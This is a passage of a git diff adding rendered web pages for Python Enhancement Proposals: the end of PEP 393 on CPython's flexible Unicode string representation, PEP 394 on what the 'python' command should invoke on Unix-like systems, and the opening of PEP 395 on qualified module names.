  • +
+

All three representations are optional, although the data form is +considered the canonical representation which can be absent only +while the string is being created. If the representation is absent, +the pointer is NULL, and the corresponding length field may contain +arbitrary data.

+

The Py_UNICODE type is still supported but deprecated. It is always +defined as a typedef for wchar_t, so the wstr representation can double +as Py_UNICODE representation.

+

The data and utf8 pointers point to the same memory if the string uses +only ASCII characters (using only Latin-1 is not sufficient). The data +and wstr pointers point to the same memory if the string happens to +fit exactly to the wchar_t type of the platform (i.e. uses some +BMP-not-Latin-1 characters if sizeof(wchar_t) is 2, and uses some +non-BMP characters if sizeof(wchar_t) is 4).

+
+

String Creation

+

The recommended way to create a Unicode object is to use the function +PyUnicode_New:

+
PyObject* PyUnicode_New(Py_ssize_t size, Py_UCS4 maxchar);
+
+
+

Both parameters must denote the eventual size/range of the strings. +In particular, codecs using this API must compute both the number of +characters and the maximum character in advance. A string is +allocated according to the specified size and character range and is +null-terminated; the actual characters in it may be uninitialized.

+

PyUnicode_FromString and PyUnicode_FromStringAndSize remain supported +for processing UTF-8 input; the input is decoded, and the UTF-8 +representation is not yet set for the string.

+

PyUnicode_FromUnicode remains supported but is deprecated. If the +Py_UNICODE pointer is non-null, the data representation is set. If the +pointer is NULL, a properly-sized wstr representation is allocated, +which can be modified until PyUnicode_READY() is called (explicitly +or implicitly). Resizing a Unicode string remains possible until it +is finalized.

+

PyUnicode_READY() converts a string containing only a wstr +representation into the canonical representation. Unless wstr and data +can share the memory, the wstr representation is discarded after the +conversion. The macro returns 0 on success and -1 on failure, which +happens in particular if the memory allocation fails.

+
+
+

String Access

+

The canonical representation can be accessed using two macros +PyUnicode_Kind and PyUnicode_Data. PyUnicode_Kind gives one of the +values PyUnicode_WCHAR_KIND (0), PyUnicode_1BYTE_KIND (1), +PyUnicode_2BYTE_KIND (2), or PyUnicode_4BYTE_KIND (3). PyUnicode_DATA +gives the void pointer to the data. Access to individual characters +should use PyUnicode_{READ|WRITE}[_CHAR]:

+
    +
  • PyUnicode_READ(kind, data, index)
  • +
  • PyUnicode_WRITE(kind, data, index, value)
  • +
  • PyUnicode_READ_CHAR(unicode, index)
  • +
+

All these macros assume that the string is in canonical form; +callers need to ensure this by calling PyUnicode_READY.

+

A new function PyUnicode_AsUTF8 is provided to access the UTF-8 +representation. It is thus identical to the existing +_PyUnicode_AsString, which is removed. The function will compute the +utf8 representation when first called. Since this representation will +consume memory until the string object is released, applications +should use the existing PyUnicode_AsUTF8String where possible +(which generates a new string object every time). APIs that implicitly +converts a string to a char* (such as the ParseTuple functions) will +use PyUnicode_AsUTF8 to compute a conversion.

+
+
+

New API

+

This section summarizes the API additions.

+

Macros to access the internal representation of a Unicode object +(read-only):

+
    +
  • PyUnicode_IS_COMPACT_ASCII(o), PyUnicode_IS_COMPACT(o), +PyUnicode_IS_READY(o)
  • +
  • PyUnicode_GET_LENGTH(o)
  • +
  • PyUnicode_KIND(o), PyUnicode_CHARACTER_SIZE(o), +PyUnicode_MAX_CHAR_VALUE(o)
  • +
  • PyUnicode_DATA(o), PyUnicode_1BYTE_DATA(o), PyUnicode_2BYTE_DATA(o), +PyUnicode_4BYTE_DATA(o)
  • +
+

Character access macros:

+
    +
  • PyUnicode_READ(kind, data, index), PyUnicode_READ_CHAR(o, index)
  • +
  • PyUnicode_WRITE(kind, data, index, value)
  • +
+

Other macros:

+
    +
  • PyUnicode_READY(o)
  • +
  • PyUnicode_CONVERT_BYTES(from_type, to_type, begin, end, to)
  • +
+

String creation functions:

+
    +
  • PyUnicode_New(size, maxchar)
  • +
  • PyUnicode_FromKindAndData(kind, data, size)
  • +
  • PyUnicode_Substring(o, start, end)
  • +
+

Character access utility functions:

+
    +
  • PyUnicode_GetLength(o), PyUnicode_ReadChar(o, index), +PyUnicode_WriteChar(o, index, character)
  • +
  • PyUnicode_CopyCharacters(to, to_start, from, from_start, how_many)
  • +
  • PyUnicode_FindChar(str, ch, start, end, direction)
  • +
+

Representation conversion:

+
    +
  • PyUnicode_AsUCS4(o, buffer, buflen)
  • +
  • PyUnicode_AsUCS4Copy(o)
  • +
  • PyUnicode_AsUnicodeAndSize(o, size_out)
  • +
  • PyUnicode_AsUTF8(o)
  • +
  • PyUnicode_AsUTF8AndSize(o, size_out)
  • +
+

UCS4 utility functions:

+
    +
  • Py_UCS4_{strlen, strcpy, strcat, strncpy, strcmp, strncpy, strcmp, +strncmp, strchr, strrchr}
  • +
+
+
+

Stable ABI

+

The following functions are added to the stable ABI (PEP 384), as they +are independent of the actual representation of Unicode objects: +PyUnicode_New, PyUnicode_Substring, PyUnicode_GetLength, +PyUnicode_ReadChar, PyUnicode_WriteChar, PyUnicode_Find, +PyUnicode_FindChar.

+
+
+

GDB Debugging Hooks

+

Tools/gdb/libpython.py contains debugging hooks that embed knowledge +about the internals of CPython’s data types, include PyUnicodeObject +instances. It has been updated to track the change.

+
+
+

Deprecations, Removals, and Incompatibilities

+

While the Py_UNICODE representation and APIs are deprecated with this +PEP, no removal of the respective APIs is scheduled. The APIs should +remain available at least five years after the PEP is accepted; before +they are removed, existing extension modules should be studied to find +out whether a sufficient majority of the open-source code on PyPI has +been ported to the new API. A reasonable motivation for using the +deprecated API even in new code is for code that shall work both on +Python 2 and Python 3.

+

The following macros and functions are deprecated:

+
    +
  • PyUnicode_FromUnicode
  • +
  • PyUnicode_GET_SIZE, PyUnicode_GetSize, PyUnicode_GET_DATA_SIZE,
  • +
  • PyUnicode_AS_UNICODE, PyUnicode_AsUnicode, PyUnicode_AsUnicodeAndSize
  • +
  • PyUnicode_COPY, PyUnicode_FILL, PyUnicode_MATCH
  • +
  • PyUnicode_Encode, PyUnicode_EncodeUTF7, PyUnicode_EncodeUTF8, +PyUnicode_EncodeUTF16, PyUnicode_EncodeUTF32, +PyUnicode_EncodeUnicodeEscape, PyUnicode_EncodeRawUnicodeEscape, +PyUnicode_EncodeLatin1, PyUnicode_EncodeASCII, +PyUnicode_EncodeCharmap, PyUnicode_TranslateCharmap, +PyUnicode_EncodeMBCS, PyUnicode_EncodeDecimal, +PyUnicode_TransformDecimalToASCII
  • +
  • Py_UNICODE_{strlen, strcat, strcpy, strcmp, strchr, strrchr}
  • +
  • PyUnicode_AsUnicodeCopy
  • +
  • PyUnicode_GetMax
  • +
+

_PyUnicode_AsDefaultEncodedString is removed. It previously returned a +borrowed reference to an UTF-8-encoded bytes object. Since the unicode +object cannot anymore cache such a reference, implementing it without +leaking memory is not possible. No deprecation phase is provided, +since it was an API for internal use only.

+

Extension modules using the legacy API may inadvertently call +PyUnicode_READY, by calling some API that requires that the object is +ready, and then continue accessing the (now invalid) Py_UNICODE +pointer. Such code will break with this PEP. The code was already +flawed in 3.2, as there is was no explicit guarantee that the +PyUnicode_AS_UNICODE result would stay valid after an API call (due to +the possibility of string resizing). Modules that face this issue +need to re-fetch the Py_UNICODE pointer after API calls; doing +so will continue to work correctly in earlier Python versions.

+
+
+
+

Discussion

+

Several concerns have been raised about the approach presented here:

+

It makes the implementation more complex. That’s true, but considered +worth it given the benefits.

+

The Py_UNICODE representation is not instantaneously available, +slowing down applications that request it. While this is also true, +applications that care about this problem can be rewritten to use the +data representation.

+
+

Performance

+

Performance of this patch must be considered for both memory +consumption and runtime efficiency. For memory consumption, the +expectation is that applications that have many large strings will see +a reduction in memory usage. For small strings, the effects depend on +the pointer size of the system, and the size of the Py_UNICODE/wchar_t +type. The following table demonstrates this for various small ASCII +and Latin-1 string sizes and platforms.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
string +sizePython 3.2This PEP
16-bit wchar_t32-bit wchar_tASCIILatin-1
32-bit64-bit32-bit64-bit32-bit64-bit32-bit64-bit
13264406432564080
24064407232564080
34064487232564080
44072488032564880
54072568032564880
64872568832564880
74872648832564880
84880649640644888
+

The runtime effect is significantly affected by the API being +used. After porting the relevant pieces of code to the new API, +the iobench, stringbench, and json benchmarks see typically +slowdowns of 1% to 30%; for specific benchmarks, speedups may +happen as may happen significantly larger slowdowns.

+

In actual measurements of a Django application ([2]), significant +reductions of memory usage could be found. For example, the storage +for Unicode objects reduced to 2216807 bytes, down from 6378540 bytes +for a wide Unicode build, and down from 3694694 bytes for a narrow +Unicode build (all on a 32-bit system). This reduction came from the +prevalence of ASCII strings in this application; out of 36,000 strings +(with 1,310,000 chars), 35713 where ASCII strings (with 1,300,000 +chars). The sources for these strings where not further analysed; +many of them likely originate from identifiers in the library, and +string constants in Django’s source code.

+

In comparison to Python 2, both Unicode and byte strings need to be +accounted. In the test application, Unicode and byte strings combined +had a length of 2,046,000 units (bytes/chars) in 2.x, and 2,200,000 +units in 3.x. On a 32-bit system, where the 2.x build used 32-bit +wchar_t/Py_UNICODE, the 2.x test used 3,620,000 bytes, and the 3.x +build 3,340,000 bytes. This reduction in 3.x using the PEP compared +to 2.x only occurs when comparing with a wide unicode build.

+
+
+
+

Porting Guidelines

+

Only a small fraction of C code is affected by this PEP, namely code +that needs to look “inside” unicode strings. That code doesn’t +necessarily need to be ported to this API, as the existing API will +continue to work correctly. In particular, modules that need to +support both Python 2 and Python 3 might get too complicated when +simultaneously supporting this new API and the old Unicode API.

+

In order to port modules to the new API, try to eliminate +the use of these API elements:

+
    +
  • the Py_UNICODE type,
  • +
  • PyUnicode_AS_UNICODE and PyUnicode_AsUnicode,
  • +
  • PyUnicode_GET_SIZE and PyUnicode_GetSize, and
  • +
  • PyUnicode_FromUnicode.
  • +
+

When iterating over an existing string, or looking at specific +characters, use indexing operations rather than pointer arithmetic; +indexing works well for PyUnicode_READ(_CHAR) and PyUnicode_WRITE. Use +void* as the buffer type for characters to let the compiler detect +invalid dereferencing operations. If you do want to use pointer +arithmetics (e.g. when converting existing code), use (unsigned) +char* as the buffer type, and keep the element size (1, 2, or 4) in a +variable. Notice that (1<<(kind-1)) will produce the element size +given a buffer kind.

+

When creating new strings, it was common in Python to start of with a +heuristical buffer size, and then grow or shrink if the heuristics +failed. With this PEP, this is now less practical, as you need not +only a heuristics for the length of the string, but also for the +maximum character.

+

In order to avoid heuristics, you need to make two passes over the +input: once to determine the output length, and the maximum character; +then allocate the target string with PyUnicode_New and iterate over +the input a second time to produce the final output. While this may +sound expensive, it could actually be cheaper than having to copy the +result again as in the following approach.

+

If you take the heuristical route, avoid allocating a string meant to +be resized, as resizing strings won’t work for their canonical +representation. Instead, allocate a separate buffer to collect the +characters, and then construct a unicode object from that using +PyUnicode_FromKindAndData. One option is to use Py_UCS4 as the buffer +element, assuming for the worst case in character ordinals. This will +allow for pointer arithmetics, but may require a lot of memory. +Alternatively, start with a 1-byte buffer, and increase the element +size as you encounter larger characters. In any case, +PyUnicode_FromKindAndData will scan over the buffer to verify the +maximum character.

+

For common tasks, direct access to the string representation may not +be necessary: PyUnicode_Find, PyUnicode_FindChar, PyUnicode_Ord, and +PyUnicode_CopyCharacters help in analyzing and creating string +objects, operating on indexes instead of data pointers.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0393.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0394/index.html b/pep-0394/index.html new file mode 100644 index 00000000000..0e12341a015 --- /dev/null +++ b/pep-0394/index.html @@ -0,0 +1,513 @@ + + + + + + + + PEP 394 – The “python” Command on Unix-Like Systems | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 394 – The “python” Command on Unix-Like Systems

+
+
Author:
+
Kerrick Staley <mail at kerrickstaley.com>, +Alyssa Coghlan <ncoghlan at gmail.com>, +Barry Warsaw <barry at python.org>, +Petr Viktorin <encukou at gmail.com>, +Miro Hrončok <miro at hroncok.cz>, +Carol Willing <willingc at gmail.com>
+
Status:
+
Active
+
Type:
+
Informational
+
Created:
+
02-Mar-2011
+
Post-History:
+
04-Mar-2011, 20-Jul-2011, 16-Feb-2012, 30-Sep-2014, 28-Apr-2018, +26-Jun-2019
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP outlines the behavior of Python scripts when the python command +is invoked. +Depending on a distribution or system configuration, +python may or may not be installed. +If python is installed its target interpreter may refer to python2 +or python3. +End users may be unaware of this inconsistency across Unix-like systems. +This PEP’s goal is to reduce user confusion about what python references +and what will be the script’s behavior.

+

The recommendations in the next section of this PEP will outline the behavior +when:

+
    +
  • using virtual environments
  • +
  • writing cross-platform scripts with shebangs for either python2 or python3
  • +
+

The PEP’s goal is to clarify the behavior for script end users, distribution +providers, and script maintainers / authors.

+
+
+

Recommendation

+

Our recommendations are detailed below. +We call out any expectations that these recommendations are based upon.

+
+

For Python runtime distributors

+
    +
  • We expect Unix-like software distributions (including systems like macOS and +Cygwin) to install the python2 command into the default path +whenever a version of the Python 2 interpreter is installed, and the same +for python3 and the Python 3 interpreter.
  • +
  • When invoked, python2 should run some version of the Python 2 +interpreter, and python3 should run some version of the Python 3 +interpreter.
  • +
  • If the python command is installed, it is expected to invoke either +the same version of Python as the python3 command or as the python2 +command.
  • +
  • Distributors may choose to set the behavior of the python command +as follows:
      +
    • python2,
    • +
    • python3,
    • +
    • not provide python command, +allow python to be configurable by an end user or +a system administrator.
    • +
    +
  • +
  • The Python 3.x idle, pydoc, and python-config commands should +likewise be available as idle3, pydoc3, and python3-config; +Python 2.x versions as idle2, pydoc2, and python2-config. +The commands with no version number should either invoke the same version +of Python as the python command, or not be available at all.
  • +
  • When packaging third party Python scripts, distributors are encouraged to +change less specific shebangs to more specific ones. +This ensures software is used with the latest version of Python available, +and it can remove a dependency on Python 2. +The details on what specifics to set are left to the distributors; +though. Example specifics could include:
      +
    • Changing python shebangs to python3 when Python 3.x is supported.
    • +
    • Changing python shebangs to python2 when Python 3.x is not yet +supported.
    • +
    • Changing python3 shebangs to python3.8 if the software is built +with Python 3.8.
    • +
    +
  • +
  • When a virtual environment (created by the PEP 405 venv package or a +similar tool such as virtualenv or conda) is active, the python +command should refer to the virtual environment’s interpreter and should +always be available. +The python3 or python2 command (according to the environment’s +interpreter version) should also be available.
  • +
+
+
+

For Python script publishers

+
    +
  • When reinvoking the interpreter from a Python script, querying +sys.executable to avoid hardcoded assumptions regarding the +interpreter location remains the preferred approach.
  • +
  • Encourage your end users to use a virtual environment. +This makes the user’s environment more predictable (possibly resulting +in fewer issues), and helps avoid disrupting their system.
  • +
  • For scripts that are only expected to be run in an activated virtual +environment, shebang lines can be written as #!/usr/bin/env python, +as this instructs the script to respect the active virtual environment.
  • +
  • In cases where the script is expected to be executed outside virtual +environments, developers will need to be aware of the following +discrepancies across platforms and installation methods:
      +
    • Older Linux distributions will provide a python command that +refers to Python 2, and will likely not provide a python2 command.
    • +
    • Some newer Linux distributions will provide a python command that +refers to Python 3.
    • +
    • Some Linux distributions will not provide a python command at +all by default, but will provide a python3 command by default.
    • +
    +
  • +
  • When potentially targeting these environments, developers may either +use a Python package installation tool that rewrites shebang lines for +the installed environment, provide instructions on updating shebang lines +interactively, or else use more specific shebang lines that are +tailored to the target environment.
  • +
  • Scripts targeting both “old systems” and systems without the default +python command need to make a compromise and document this situation. +Avoiding shebangs (via the console_scripts Entry Points ([9]) or similar +means) is the recommended workaround for this problem.
  • +
  • Applications designed exclusively for a specific environment (such as +a container or virtual environment) may continue to use the python +command name.
  • +
+
+
+

For end users of Python

+
    +
  • While far from being universally available, python remains the +preferred spelling for explicitly invoking Python, as this is the +spelling that virtual environments make consistently available +across different platforms and Python installations.
  • +
  • For software that is not distributed with (or developed for) your system, +we recommend using a virtual environment, possibly with an environment +manager like conda or pipenv, to help avoid disrupting your system +Python installation.
  • +
+

These recommendations are the outcome of the relevant python-dev discussions +in March and July 2011 ([1], [2]), February 2012 ([4]), +September 2014 ([6]), discussion on GitHub in April 2018 ([7]), +on python-dev in February 2019 ([8]), and during the PEP update review +in May/June 2019 ([10]).

+
+
+
+

History of this PEP

+

In 2011, the majority of distributions +aliased the python command to Python 2, but some started switching it to +Python 3 ([5]). As some of the former distributions did not provide a +python2 command by default, there was previously no way for Python 2 code +(or any code that invokes the Python 2 interpreter directly rather than via +sys.executable) to reliably run on all Unix-like systems without +modification, as the python command would invoke the wrong interpreter +version on some systems, and the python2 command would fail completely +on others. This PEP originally provided a very simple mechanism +to restore cross-platform support, with minimal additional work required +on the part of distribution maintainers. Simplified, the recommendation was:

+
    +
  1. The python command was preferred for code compatible with both +Python 2 and 3 (since it was available on all systems, even those that +already aliased it to Python 3).
  2. +
  3. The python command should always invoke Python 2 (to prevent +hard-to-diagnose errors when Python 2 code is run on Python 3).
  4. +
  5. The python2 and python3 commands should be available to specify +the version explicitly.
  6. +
+

However, these recommendations implicitly assumed that Python 2 would always be +available. As Python 2 is nearing its end of life in 2020 (PEP 373, PEP 404), +distributions are making Python 2 optional or removing it entirely. +This means either removing the python command or switching it to invoke +Python 3. Some distributors also decided that their users were better served by +ignoring the PEP’s original recommendations, and provided system +administrators with the freedom to configure their systems based on +the needs of their particular environment.

+
+
+

Current Rationale

+

As of 2019, activating a Python virtual environment (or its functional +equivalent) prior to script execution is one way to obtain a consistent +cross-platform and cross-distribution experience.

+

Accordingly, publishers can expect users of the software to provide a suitable +execution environment.

+
+
+

Future Changes to this Recommendation

+

This recommendation will be periodically reviewed over the next few years, +and updated when the core development team judges it appropriate. As a +point of reference, regular maintenance releases for the Python 2.7 series +will continue until January 2020.

+
+
+

Migration Notes

+

This section does not contain any official recommendations from the core +CPython developers. It’s merely a collection of notes regarding various +aspects of migrating to Python 3 as the default version of Python for a +system. They will hopefully be helpful to any distributions considering +making such a change.

+
    +
  • The main barrier to a distribution switching the python command from +python2 to python3 isn’t breakage within the distribution, but +instead breakage of private third party scripts developed by sysadmins +and other users. Updating the python command to invoke python3 +by default indicates that a distribution is willing to break such scripts +with errors that are potentially quite confusing for users that aren’t +familiar with the backwards incompatible changes in Python 3. For +example, while the change of print from a statement to a builtin +function is relatively simple for automated converters to handle, the +SyntaxError from attempting to use the Python 2 notation in Python 3 +may be confusing for users that are not aware of the change:
    $ python3 -c 'print "Hello, world!"'
    +  File "<string>", line 1
    +    print "Hello, world!"
    +          ^
    +SyntaxError: Missing parentheses in call to 'print'. Did you mean print("Hello, world!")?
    +
    +
    +

    While this might be obvious for experienced Pythonistas, such scripts +might even be run by people who are not familiar with Python at all. +Avoiding breakage of such third party scripts was the key reason this +PEP used to recommend that python continue to refer to python2.

    +
  • +
  • The error message python: command not found tends to be surprisingly +actionable, even for people unfamiliar with Python.
  • +
  • The pythonX.X (e.g. python3.6) commands exist on modern systems, on +which they invoke specific minor versions of the Python interpreter. It +can be useful for distribution-specific packages to take advantage of these +utilities if they exist, since it will prevent code breakage if the default +minor version of a given major version is changed. However, scripts +intending to be cross-platform should not rely on the presence of these +utilities, but rather should be tested on several recent minor versions of +the target major version, compensating, if necessary, for the small +differences that exist between minor versions. This prevents the need for +sysadmins to install many very similar versions of the interpreter.
  • +
  • When the pythonX.X binaries are provided by a distribution, the +python2 and python3 commands should refer to one of those files +rather than being provided as a separate binary file.
  • +
  • It is strongly encouraged that distribution-specific packages use python3 +(or python2) rather than python, even in code that is not intended to +operate on other distributions. This will reduce problems if the +distribution later decides to change the version of the Python interpreter +that the python command invokes, or if a sysadmin installs a custom +python command with a different major version than the distribution +default.
  • +
  • If the above point is adhered to and sysadmins are permitted to change the +python command, then the python command should always be implemented +as a link to the interpreter binary (or a link to a link) and not vice +versa. That way, if a sysadmin does decide to replace the installed +python file, they can do so without inadvertently deleting the +previously installed binary.
  • +
  • Even as the Python 2 interpreter becomes less common, it remains reasonable +for scripts to continue to use the python3 convention, rather than just +python.
  • +
  • If these conventions are adhered to, it will become the case that the +python command is only executed in an interactive manner as a user +convenience, or else when using a virtual environment or similar mechanism.
  • +
+
+
+

Backwards Compatibility

+

A potential problem can arise if a script adhering to the +python2/python3 convention is executed on a system not supporting +these commands. This is mostly a non-issue, since the sysadmin can simply +create these symbolic links and avoid further problems. It is a significantly +more obvious breakage than the sometimes cryptic errors that can arise when +attempting to execute a script containing Python 2 specific syntax with a +Python 3 interpreter or vice versa.

+
+
+

Application to the CPython Reference Interpreter

+

While technically a new feature, the make install and make bininstall +command in the 2.7 version of CPython were adjusted to create the +following chains of symbolic links in the relevant bin directory (the +final item listed in the chain is the actual installed binary, preceding +items are relative symbolic links):

+
python -> python2 -> python2.7
+python-config -> python2-config -> python2.7-config
+
+
+

Similar adjustments were made to the macOS binary installer.

+

This feature first appeared in the default installation process in +CPython 2.7.3.

+

The installation commands in the CPython 3.x series already create the +appropriate symlinks. For example, CPython 3.2 creates:

+
python3 -> python3.2
+idle3 -> idle3.2
+pydoc3 -> pydoc3.2
+python3-config -> python3.2-config
+
+
+

And CPython 3.3 creates:

+
python3 -> python3.3
+idle3 -> idle3.3
+pydoc3 -> pydoc3.3
+python3-config -> python3.3-config
+pysetup3 -> pysetup3.3
+
+
+

The implementation progress of these features in the default installers was +managed on the tracker as issue #12627 ([3]).

+
+
+

Impact on PYTHON* Environment Variables

+

The choice of target for the python command implicitly affects a +distribution’s expected interpretation of the various Python related +environment variables. The use of *.pth files in the relevant +site-packages folder, the “per-user site packages” feature (see +python -m site) or more flexible tools such as virtualenv are all more +tolerant of the presence of multiple versions of Python on a system than the +direct use of PYTHONPATH.

+
+
+

Exclusion of MS Windows

+

This PEP deliberately excludes any proposals relating to Microsoft Windows, as +devising an equivalent solution for Windows was deemed too complex to handle +here. PEP 397 and the related discussion on the python-dev mailing list +address this issue.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0394.rst

+

Last modified: 2024-02-26 08:33:49 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0395/index.html b/pep-0395/index.html new file mode 100644 index 00000000000..6fd012544d2 --- /dev/null +++ b/pep-0395/index.html @@ -0,0 +1,823 @@ + + + + + + + + PEP 395 – Qualified Names for Modules | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 395 – Qualified Names for Modules

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
04-Mar-2011
+
Python-Version:
+
3.4
+
Post-History:
+
05-Mar-2011, 19-Nov-2011
+
+
+
+
Table of Contents +
+
+

PEP Withdrawal

+

This PEP was withdrawn by the author in December 2013, as other significant +changes in the time since it was written have rendered several aspects +obsolete. Most notably PEP 420 namespace packages rendered some of the +proposals related to package detection unworkable and PEP 451 module +specifications resolved the multiprocessing issues and provide a possible +means to tackle the pickle compatibility issues.

+

A future PEP to resolve the remaining issues would still be appropriate, +but it’s worth starting any such effort as a fresh PEP restating the +remaining problems in an updated context rather than trying to build on +this one directly.

+
+
+

Abstract

+

This PEP proposes new mechanisms that eliminate some longstanding traps for +the unwary when dealing with Python’s import system, as well as serialisation +and introspection of functions and classes.

+

It builds on the “Qualified Name” concept defined in PEP 3155.

+
+

Relationship with Other PEPs

+

Most significantly, this PEP is currently deferred as it requires +significant changes in order to be made compatible with the removal +of mandatory __init__.py files in PEP 420 (which has been implemented +and released in Python 3.3).

+

This PEP builds on the “qualified name” concept introduced by PEP 3155, and +also shares in that PEP’s aim of fixing some ugly corner cases when dealing +with serialisation of arbitrary functions and classes.

+

It also builds on PEP 366, which took initial tentative steps towards making +explicit relative imports from the main module work correctly in at least +some circumstances.

+

Finally, PEP 328 eliminated implicit relative imports from imported modules. +This PEP proposes that the de facto implicit relative imports from main +modules that are provided by the current initialisation behaviour for +sys.path[0] also be eliminated.

+
+
+
+

What’s in a __name__?

+

Over time, a module’s __name__ attribute has come to be used to handle a +number of different tasks.

+

The key use cases identified for this module attribute are:

+
    +
  1. Flagging the main module in a program, using the if __name__ == +"__main__": convention.
  2. +
  3. As the starting point for relative imports
  4. +
  5. To identify the location of function and class definitions within the +running application
  6. +
  7. To identify the location of classes for serialisation into pickle objects +which may be shared with other interpreter instances
  8. +
+
+
+

Traps for the Unwary

+

The overloading of the semantics of __name__, along with some historically +associated behaviour in the initialisation of sys.path[0], has resulted in +several traps for the unwary. These traps can be quite annoying in practice, +as they are highly unobvious (especially to beginners) and can cause quite +confusing behaviour.

+
+

Why are my imports broken?

+

There’s a general principle that applies when modifying sys.path: never +put a package directory directly on sys.path. The reason this is +problematic is that every module in that directory is now potentially +accessible under two different names: as a top level module (since the +package directory is on sys.path) and as a submodule of the package (if +the higher level directory containing the package itself is also on +sys.path).

+

As an example, Django (up to and including version 1.3) is guilty of setting +up exactly this situation for site-specific applications - the application +ends up being accessible as both app and site.app in the module +namespace, and these are actually two different copies of the module. This +is a recipe for confusion if there is any meaningful mutable module level +state, so this behaviour is being eliminated from the default site set up in +version 1.4 (site-specific apps will always be fully qualified with the site +name).

+

However, it’s hard to blame Django for this, when the same part of Python +responsible for setting __name__ = "__main__" in the main module commits +the exact same error when determining the value for sys.path[0].

+

The impact of this can be seen relatively frequently if you follow the +“python” and “import” tags on Stack Overflow. When I had the time to follow +it myself, I regularly encountered people struggling to understand the +behaviour of straightforward package layouts like the following (I actually +use package layouts along these lines in my own projects):

+
project/
+    setup.py
+    example/
+        __init__.py
+        foo.py
+        tests/
+            __init__.py
+            test_foo.py
+
+
+

While I would often see it without the __init__.py files first, that’s a +trivial fix to explain. What’s hard to explain is that all of the following +ways to invoke test_foo.py probably won’t work due to broken imports +(either failing to find example for absolute imports, complaining +about relative imports in a non-package or beyond the toplevel package for +explicit relative imports, or issuing even more obscure errors if some other +submodule happens to shadow the name of a top-level module, such as an +example.json module that handled serialisation or an +example.tests.unittest test runner):

+
# These commands will most likely *FAIL*, even if the code is correct
+
+# working directory: project/example/tests
+./test_foo.py
+python test_foo.py
+python -m package.tests.test_foo
+python -c "from package.tests.test_foo import main; main()"
+
+# working directory: project/package
+tests/test_foo.py
+python tests/test_foo.py
+python -m package.tests.test_foo
+python -c "from package.tests.test_foo import main; main()"
+
+# working directory: project
+example/tests/test_foo.py
+python example/tests/test_foo.py
+
+# working directory: project/..
+project/example/tests/test_foo.py
+python project/example/tests/test_foo.py
+# The -m and -c approaches don't work from here either, but the failure
+# to find 'package' correctly is easier to explain in this case
+
+
+

That’s right, that long list is of all the methods of invocation that will +almost certainly break if you try them, and the error messages won’t make +any sense if you’re not already intimately familiar not only with the way +Python’s import system works, but also with how it gets initialised.

+

For a long time, the only way to get sys.path right with that kind of +setup was to either set it manually in test_foo.py itself (hardly +something a novice, or even many veteran, Python programmers are going to +know how to do) or else to make sure to import the module instead of +executing it directly:

+
# working directory: project
+python -c "from package.tests.test_foo import main; main()"
+
+
+

Since the implementation of PEP 366 (which defined a mechanism that allows +relative imports to work correctly when a module inside a package is executed +via the -m switch), the following also works properly:

+
# working directory: project
+python -m package.tests.test_foo
+
+
+

The fact that most methods of invoking Python code from the command line +break when that code is inside a package, and the two that do work are highly +sensitive to the current working directory is all thoroughly confusing for a +beginner. I personally believe it is one of the key factors leading +to the perception that Python packages are complicated and hard to get right.

+

This problem isn’t even limited to the command line - if test_foo.py is +open in Idle and you attempt to run it by pressing F5, or if you try to run +it by clicking on it in a graphical filebrowser, then it will fail in just +the same way it would if run directly from the command line.

+

There’s a reason the general “no package directories on sys.path” +guideline exists, and the fact that the interpreter itself doesn’t follow +it when determining sys.path[0] is the root cause of all sorts of grief.

+

In the past, this couldn’t be fixed due to backwards compatibility concerns. +However, scripts potentially affected by this problem will already require +fixes when porting to the Python 3.x (due to the elimination of implicit +relative imports when importing modules normally). This provides a convenient +opportunity to implement a corresponding change in the initialisation +semantics for sys.path[0].

+
+
+

Importing the main module twice

+

Another venerable trap is the issue of importing __main__ twice. This +occurs when the main module is also imported under its real name, effectively +creating two instances of the same module under different names.

+

If the state stored in __main__ is significant to the correct operation +of the program, or if there is top-level code in the main module that has +non-idempotent side effects, then this duplication can cause obscure and +surprising errors.

+
+
+

In a bit of a pickle

+

Something many users may not realise is that the pickle module sometimes +relies on the __module__ attribute when serialising instances of arbitrary +classes. So instances of classes defined in __main__ are pickled that way, +and won’t be unpickled correctly by another python instance that only imported +that module instead of running it directly. This behaviour is the underlying +reason for the advice from many Python veterans to do as little as possible +in the __main__ module in any application that involves any form of +object serialisation and persistence.

+

Similarly, when creating a pseudo-module (see next paragraph), pickles rely +on the name of the module where a class is actually defined, rather than the +officially documented location for that class in the module hierarchy.

+

For the purposes of this PEP, a “pseudo-module” is a package designed like +the Python 3.2 unittest and concurrent.futures packages. These +packages are documented as if they were single modules, but are in fact +internally implemented as a package. This is supposed to be an +implementation detail that users and other implementations don’t need to +worry about, but, thanks to pickle (and serialisation in general), +the details are often exposed and can effectively become part of the public +API.

+

While this PEP focuses specifically on pickle as the principal +serialisation scheme in the standard library, this issue may also affect +other mechanisms that support serialisation of arbitrary class instances +and rely on __module__ attributes to determine how to handle +deserialisation.

+
+
+

Where’s the source?

+

Some sophisticated users of the pseudo-module technique described +above recognise the problem with implementation details leaking out via the +pickle module, and choose to address it by altering __name__ to refer +to the public location for the module before defining any functions or classes +(or else by modifying the __module__ attributes of those objects after +they have been defined).

+

This approach is effective at eliminating the leakage of information via +pickling, but comes at the cost of breaking introspection for functions and +classes (as their __module__ attribute now points to the wrong place).

+
+
+

Forkless Windows

+

